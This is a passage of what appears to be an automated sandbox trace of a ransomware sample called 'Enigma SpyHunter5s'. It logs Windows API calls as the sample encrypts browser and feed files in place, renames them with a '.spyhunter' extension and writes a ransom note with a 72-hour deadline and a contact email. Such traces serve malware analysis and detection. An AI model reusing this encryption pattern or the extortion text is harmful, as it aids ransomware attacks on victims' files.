dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eba0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eba0*=0x30) returned 1 [0156.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.452] GetProcessHeap () returned 0x2c0000 [0156.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.452] GetProcessHeap () returned 0x2c0000 [0156.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4aa10 | out: hHeap=0x2c0000) returned 1 [0156.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.454] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0156.454] WriteFile (in: hFile=0xa0, lpBuffer=0x57eadb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57ec04, lpOverlapped=0x0 | out: lpBuffer=0x57eadb*, lpNumberOfBytesWritten=0x57ec04*=0x127, lpOverlapped=0x0) returned 1 [0156.455] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0156.455] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57ec04, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57ec04*=0x2ac, lpOverlapped=0x0) returned 1 [0156.455] CloseHandle (hObject=0xa0) returned 1 [0156.455] GetProcessHeap () returned 0x2c0000 [0156.455] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2aa38 | out: hHeap=0x2c0000) returned 1 [0156.456] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eba0 | out: pbBuffer=0x57eba0) returned 1 [0156.456] GetProcessHeap () returned 0x2c0000 [0156.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.462] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb98*=0x30) returned 1 [0156.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.463] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms") returned 100 [0156.463] StrStrW (lpFirst="MSNBC News~.feed-ms", lpSrch=".txt") returned 0x0 [0156.463] GetProcessHeap () returned 0x2c0000 [0156.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.463] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.473] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.473] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.474] GetProcessHeap () returned 0x2c0000 [0156.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.474] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.474] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x57eb9c*, lpNumberOfBytesWritten=0x57eb5c*=0x4, lpOverlapped=0x0) returned 1 [0156.474] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb5c*=0x30, lpOverlapped=0x0) returned 1 [0156.474] CloseHandle (hObject=0xa0) returned 1 [0156.474] GetProcessHeap () returned 0x2c0000 [0156.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.474] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.spyhunter") returned 110 [0156.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\MSNBC News~.feed-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\msnbc news~.feed-ms.spyhunter")) returned 1 [0156.475] GetProcessHeap () returned 0x2c0000 [0156.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.475] GetProcessHeap () returned 0x2c0000 [0156.475] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.476] GetProcessHeap () returned 0x2c0000 [0156.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a4c0 | out: hHeap=0x2c0000) returned 1 [0156.476] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eba0 | out: pbBuffer=0x57eba0) returned 1 [0156.476] GetProcessHeap () returned 0x2c0000 [0156.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.476] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb98*=0x30) returned 1 [0156.476] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.476] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms") returned 107 [0156.477] StrStrW (lpFirst="Microsoft at Home~.feed-ms", lpSrch=".txt") returned 0x0 [0156.477] GetProcessHeap () returned 0x2c0000 [0156.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.477] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.514] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.514] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb5c*=0x2800, lpOverlapped=0x0) returned 1 [0156.514] GetProcessHeap () returned 0x2c0000 [0156.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.514] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.514] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x57eb9c*, lpNumberOfBytesWritten=0x57eb5c*=0x4, lpOverlapped=0x0) returned 1 [0156.514] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb5c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb5c*=0x30, lpOverlapped=0x0) returned 1 [0156.514] CloseHandle (hObject=0xa0) returned 1 [0156.514] GetProcessHeap () returned 0x2c0000 [0156.514] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.515] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.spyhunter") returned 117 [0156.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\Microsoft Feeds~\\Microsoft at Home~.feed-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\microsoft feeds~\\microsoft at home~.feed-ms.spyhunter")) returned 1 [0156.516] GetProcessHeap () returned 0x2c0000 [0156.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.516] GetProcessHeap () returned 0x2c0000 [0156.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.516] GetProcessHeap () returned 0x2c0000 [0156.516] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4a570 | out: hHeap=0x2c0000) returned 1 [0156.516] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb98 | out: pbBuffer=0x57eb98) returned 1 [0156.516] GetProcessHeap () returned 0x2c0000 [0156.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.516] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb90*=0x30) returned 1 [0156.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.517] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences") returned 98 [0156.517] StrStrW (lpFirst="Secure Preferences", lpSrch=".txt") returned 0x0 [0156.517] GetProcessHeap () returned 0x2c0000 [0156.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.517] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb54*=0x2800, lpOverlapped=0x0) returned 1 [0156.542] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.542] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb54*=0x2800, lpOverlapped=0x0) returned 1 [0156.542] GetProcessHeap () returned 0x2c0000 [0156.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.543] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.543] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x57eb94*, lpNumberOfBytesWritten=0x57eb54*=0x4, lpOverlapped=0x0) returned 1 [0156.544] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb54*=0x30, lpOverlapped=0x0) returned 1 [0156.544] CloseHandle (hObject=0xa0) returned 1 [0156.545] GetProcessHeap () returned 0x2c0000 [0156.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.545] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.spyhunter") returned 108 [0156.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Secure Preferences.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\secure preferences.spyhunter")) returned 1 [0156.546] GetProcessHeap () returned 0x2c0000 [0156.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.546] GetProcessHeap () returned 0x2c0000 [0156.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.546] GetProcessHeap () returned 0x2c0000 [0156.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a290 | out: hHeap=0x2c0000) returned 1 [0156.546] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb98 | out: pbBuffer=0x57eb98) returned 1 [0156.546] GetProcessHeap () returned 0x2c0000 [0156.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.546] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb90*=0x30) returned 1 [0156.546] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.547] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal") returned 106 [0156.547] StrStrW (lpFirst="Origin Bound Certs-journal", lpSrch=".txt") returned 0x0 [0156.547] GetProcessHeap () returned 0x2c0000 [0156.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.547] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb54*=0x0, lpOverlapped=0x0) returned 1 [0156.547] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.547] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb54*=0x0, lpOverlapped=0x0) returned 1 [0156.547] GetProcessHeap () returned 0x2c0000 [0156.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.548] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.548] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x57eb94*, lpNumberOfBytesWritten=0x57eb54*=0x4, lpOverlapped=0x0) returned 1 [0156.548] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb54*=0x30, lpOverlapped=0x0) returned 1 [0156.549] CloseHandle (hObject=0xa0) returned 1 [0156.549] GetProcessHeap () returned 0x2c0000 [0156.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.549] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.spyhunter") returned 116 [0156.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs-journal.spyhunter")) returned 1 [0156.550] GetProcessHeap () returned 0x2c0000 [0156.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.550] GetProcessHeap () returned 0x2c0000 [0156.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.550] GetProcessHeap () returned 0x2c0000 [0156.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbbbb0 | out: hHeap=0x2c0000) returned 1 [0156.550] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb90 | out: pbBuffer=0x57eb90) returned 1 [0156.550] GetProcessHeap () returned 0x2c0000 [0156.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.550] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57eb88*=0x30) returned 1 [0156.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0156.551] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs") returned 98 [0156.551] StrStrW (lpFirst="Origin Bound Certs", lpSrch=".txt") returned 0x0 [0156.551] GetProcessHeap () returned 0x2c0000 [0156.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.551] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57eb4c*=0x1400, lpOverlapped=0x0) returned 1 [0156.565] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffec00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.566] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57eb4c*=0x1400, lpOverlapped=0x0) returned 1 [0156.566] GetProcessHeap () returned 0x2c0000 [0156.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.566] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.566] WriteFile (in: hFile=0xa0, lpBuffer=0x57eb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x57eb8c*, lpNumberOfBytesWritten=0x57eb4c*=0x4, lpOverlapped=0x0) returned 1 [0156.566] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57eb4c*=0x30, lpOverlapped=0x0) returned 1 [0156.566] CloseHandle (hObject=0xa0) returned 1 [0156.566] GetProcessHeap () returned 0x2c0000 [0156.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.566] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.spyhunter") returned 108 [0156.567] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Origin Bound Certs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\origin bound certs.spyhunter")) returned 1 [0156.567] GetProcessHeap () returned 0x2c0000 [0156.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.567] GetProcessHeap () returned 0x2c0000 [0156.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0156.567] GetProcessHeap () returned 0x2c0000 [0156.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f297a0 | out: hHeap=0x2c0000) returned 1 [0156.568] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57eb90 | out: pbBuffer=0x57eb90) returned 1 [0156.568] GetProcessHeap () returned 0x2c0000 [0156.568] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0156.568] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57eb88*=0x20, dwBufLen=0x30 | out: 